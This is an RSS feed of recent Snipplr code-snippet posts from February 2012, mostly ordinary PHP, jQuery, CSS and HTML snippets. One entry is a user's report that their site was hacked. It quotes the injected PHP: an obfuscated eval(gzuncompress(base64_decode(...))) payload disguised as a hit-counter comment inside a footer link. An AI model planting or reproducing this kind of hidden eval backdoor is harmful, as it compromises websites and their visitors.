<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title>Snipplr</title>
<link>http://snipplr.com</link>
<description>Recent snippets posted on Snipplr.com</description>
<language>en-us</language>
<pubDate>Mon, 13 Feb 2012 11:31:08 GMT</pubDate>
<item>
<title>(PHP) jQuery syle DOM navigation in PHP with phpQuery - FatFolderDesigner</title>
<link>http://snipplr.com/view/63292/jquery-syle-dom-navigation-in-php-with-phpquery/</link>
<description><![CDATA[ <p>Navigating the DOM in jQuery is incredibly simple and thats to phpQuery you can do the same in php. Below are some examples of how it's used, the key change bing that instead of $() you use pq(), and instead of a . you used ->. Theres alot more details information at the link if your interested. Post questions/comments here or there.

You can get the phpquery files, and well as read the manual at the google code page here: http://code.google.com/p/phpquery/</p> ]]></description>
<pubDate>Mon, 13 Feb 2012 09:55:58 GMT</pubDate>
<guid>http://snipplr.com/view/63292/jquery-syle-dom-navigation-in-php-with-phpquery/</guid>
</item>
<item>
<title>(PHP) My website was hacked with this - AlexanderRavikovich</title>
<link>http://snipplr.com/view/63291/my-website-was-hacked-with-this/</link>
<description><![CDATA[ <p>My website was hacked. I dont use WordPress, i used Codeigniter.

			I found an php syntax error on my page in footer.php file.

			When i opened footer.php, I sew this added code to the  url of link:


			&amp;lt;a href=&amp;quot;&amp;lt;?php
			//Webalizer Hit Counter For Website
			eval(gzuncompress(base64_decode(&amp;#39;eF6Nkw9rozAYxr+Kk6EGyuh2f+CQcFdW297h7BZ17ChDokbNNZpi4na70u9+0WvXdnfFA8Hk5fc8Sd4noZl1RoUg0joXiMj6BYB1zniMmbYt2Ns/vFSjUJB6lJNKQiFryRl/JrV1HvkOunfQwpwFwW0Uqlk0mjpeYD4CpZHXTc1muEoZgV7ouruSS6sl1HWbZpal3NRnHSwwMHPOc0ZMAKGWYSYIMIx/ci+44LwfizFNm36sFFU/xFekxv1YUtS8/I8TxLTK+ymBM1zTfi7m8gACa9XfbcKvOSHnZh440Wg8Riojxcq6IZphaG/BLtDZ3A/2GFgf5hdjQT6+j1KS8JRYJp6hYTLmT+7VZJmW9z/iqw8lfvgm3dJ7iv1Pv9LpZOi+84bfH+6aZFo8m0C7MD/TFTS1C2VJqs7m1EYVazTqoLi7gceSfQc6LOUlplWFS3LK+vBorSJrGFthWZzeyl3o+EEUoq9bRVKQZNniu65NnWBhMs6Xf1/8RA0jWtH2nb12D9ibjUrniNTOVJ/bZwLWnUY585U8ZgbXIXLnt0GEnCBEXoBGnj9x0OASdI9VNEzCL52a/CTJsRbY3Yp/qMXwEUJ9rreZ7iu6ptskKbi2K9qbzixhXJC3bpvNbzILaXQ=&amp;#39;))); ?&amp;gt;/&amp;quot; class=&amp;quot;store points&amp;quot;&amp;gt;&amp;lt;span&amp;gt;Симпатии +&amp;lt;/span&amp;gt;&amp;lt;/a&amp;gt;


			What I found in the internet, is about vulnerability in &amp;quot;timthumb.php&amp;quot; of WordPress. But, as I said, I dont use Wordpress and dont use TimThumb ... so, it&amp;#39;s strange...</p> ]]></description>
<pubDate>Mon, 13 Feb 2012 07:42:05 GMT</pubDate>
<guid>http://snipplr.com/view/63291/my-website-was-hacked-with-this/</guid>
</item>
<item>
<title>(jQuery) Smooth Scroll to Top Function - thewickedchemist</title>
<link>http://snipplr.com/view/63285/smooth-scroll-to-top-function/</link>
<description><![CDATA[ <p>Hides the button based on scroll position, fades in and out as necessary and upon click smoothly scrolls back to the top.</p> ]]></description>
<pubDate>Sun, 12 Feb 2012 12:38:43 GMT</pubDate>
<guid>http://snipplr.com/view/63285/smooth-scroll-to-top-function/</guid>
</item>
<item>
<title>(CSS) Elastic Videos for Responsive Design - thewickedchemist</title>
<link>http://snipplr.com/view/63284/elastic-videos-for-responsive-design/</link>
<description><![CDATA[ <p>Originally from: http://webdesignerwall.com/tutorials/css-elastic-videos</p> ]]></description>
<pubDate>Sun, 12 Feb 2012 12:28:37 GMT</pubDate>
<guid>http://snipplr.com/view/63284/elastic-videos-for-responsive-design/</guid>
</item>
<item>
<title>(ActionScript 3) ActionScript 3 SliceBitmap Class - burnandbass</title>
<link>http://snipplr.com/view/63280/actionscript-3-slicebitmap-class/</link>
<description><![CDATA[ <p>just slice bitmap class, takes DisplayObject, return array of BitmapData's

Can be used to do something like this: http://burnandbass.com/basstaslider</p> ]]></description>
<pubDate>Sun, 12 Feb 2012 06:46:10 GMT</pubDate>
<guid>http://snipplr.com/view/63280/actionscript-3-slicebitmap-class/</guid>
</item>
<item>
<title>(CSS) Smooth web fonts for sexy anti-aliased display - thewickedchemist</title>
<link>http://snipplr.com/view/63279/smooth-web-fonts-for-sexy-antialiased-display/</link>
<description><![CDATA[ <p>Well known fix for ugly webfonts...</p> ]]></description>
<pubDate>Sun, 12 Feb 2012 06:35:04 GMT</pubDate>
<guid>http://snipplr.com/view/63279/smooth-web-fonts-for-sexy-antialiased-display/</guid>
</item>
<item>
<title>(jQuery) jQuery Textpander - phiqle</title>
<link>http://snipplr.com/view/63278/jquery-textpander/</link>
<description><![CDATA[ <p>Simple jQuery Textpander</p> ]]></description>
<pubDate>Sun, 12 Feb 2012 03:39:51 GMT</pubDate>
<guid>http://snipplr.com/view/63278/jquery-textpander/</guid>
</item>
<item>
<title>(HTML) Mr - alexpeter1986</title>
<link>http://snipplr.com/view/63277/mr/</link>
<description><![CDATA[ <p>Kindle Fire Screen Protector</p> ]]></description>
<pubDate>Sat, 11 Feb 2012 20:27:01 GMT</pubDate>
<guid>http://snipplr.com/view/63277/mr/</guid>
</item>
<item>
<title>(PHP) Register Nav Menu - shufflepath</title>
<link>http://snipplr.com/view/63276/register-nav-menu/</link>
<description><![CDATA[ <p></p> ]]></description>
<pubDate>Sat, 11 Feb 2012 14:51:38 GMT</pubDate>
<guid>http://snipplr.com/view/63276/register-nav-menu/</guid>
</item>
<item>
<title>(PHP) Custom Post Type and Taxonomies - shufflepath</title>
<link>http://snipplr.com/view/63275/custom-post-type-and-taxonomies/</link>
<description><![CDATA[ <p></p> ]]></description>
<pubDate>Sat, 11 Feb 2012 14:51:28 GMT</pubDate>
<guid>http://snipplr.com/view/63275/custom-post-type-and-taxonomies/</guid>
</item>
<item>
<title>(HTML) XHTML Transitional starter - shufflepath</title>
<link>http://snipplr.com/view/63272/xhtml-transitional-starter/</link>
<description><![CDATA[ <p></p> ]]></description>
<pubDate>Sat, 11 Feb 2012 14:09:33 GMT</pubDate>
<guid>http://snipplr.com/view/63272/xhtml-transitional-starter/</guid>
</item>
<item>
<title>(HTML) XHTML Strict starter - shufflepath</title>
<link>http://snipplr.com/view/63271/xhtml-strict-starter/</link>
<description><![CDATA[ <p></p> ]]></description>
<pubDate>Sat, 11 Feb 2012 14:09:28 GMT</pubDate>
<guid>http://snipplr.com/view/63271/xhtml-strict-starter/</guid>
</item>
<item>
<title>(HTML) HTML Transitional starter - shufflepath</title>
<link>http://snipplr.com/view/63270/html-transitional-starter/</link>
<description><![CDATA[ <p></p> ]]></description>
<pubDate>Sat, 11 Feb 2012 14:09:18 GMT</pubDate>
<guid>http://snipplr.com/view/63270/html-transitional-starter/</guid>
</item>
<item>
<title>(HTML) HTML Strict starter - shufflepath</title>
<link>http://snipplr.com/view/63269/html-strict-starter/</link>
<description><![CDATA[ <p></p> ]]></description>
<pubDate>Sat, 11 Feb 2012 14:09:12 GMT</pubDate>
<guid>http://snipplr.com/view/63269/html-strict-starter/</guid>
</item>
<item>
<title>(PHP) Php check for the top of the hour - poot26</title>
<link>http://snipplr.com/view/63267/php-check-for-the-top-of-the-hour/</link>
<description><![CDATA[ <p>Php check for the top of the hour</p> ]]></description>
<pubDate>Sat, 11 Feb 2012 12:03:30 GMT</pubDate>
<guid>http://snipplr.com/view/63267/php-check-for-the-top-of-the-hour/</guid>
</item>
<item>
<title>(jQuery) Javascript/jQuery to check for the time - poot26</title>
<link>http://snipplr.com/view/63266/javascriptjquery-to-check-for-the-time/</link>
<description><![CDATA[ <p>Javascript/jQuery to check for the time</p> ]]></description>
<pubDate>Sat, 11 Feb 2012 11:46:35 GMT</pubDate>
<guid>http://snipplr.com/view/63266/javascriptjquery-to-check-for-the-time/</guid>
</item>
<item>
<title>(HTML) Php conditionals to echo proper audio tags - poot26</title>
<link>http://snipplr.com/view/63264/php-conditionals-to-echo-proper-audio-tags/</link>
<description><![CDATA[ <p>Php conditionals to echo proper audio tags</p> ]]></description>
<pubDate>Sat, 11 Feb 2012 11:39:27 GMT</pubDate>
<guid>http://snipplr.com/view/63264/php-conditionals-to-echo-proper-audio-tags/</guid>
</item>
<item>
<title>(HTML) Html5 Audio Tag - poot26</title>
<link>http://snipplr.com/view/63263/html5-audio-tag/</link>
<description><![CDATA[ <p>Html5 audio tag</p> ]]></description>
<pubDate>Sat, 11 Feb 2012 11:31:49 GMT</pubDate>
<guid>http://snipplr.com/view/63263/html5-audio-tag/</guid>
</item>
<item>
<title>(HTML) Basic Html5 Skeleton - poot26</title>
<link>http://snipplr.com/view/63262/basic-html5-skeleton/</link>
<description><![CDATA[ <p>Html5 Skeleton</p> ]]></description>
<pubDate>Sat, 11 Feb 2012 11:00:05 GMT</pubDate>
<guid>http://snipplr.com/view/63262/basic-html5-skeleton/</guid>
</item>
<item>
<title>(PHP) Pagination using twitter bootstrap styles - bitsculptor</title>
<link>http://snipplr.com/view/63258/pagination-using-twitter-bootstrap-styles/</link>
<description><![CDATA[ <p>this can be adapted by simply changing the urls. starts with an array for incoming data.</p> ]]></description>
<pubDate>Sat, 11 Feb 2012 06:20:15 GMT</pubDate>
<guid>http://snipplr.com/view/63258/pagination-using-twitter-bootstrap-styles/</guid>
</item>
</channel>
</rss>
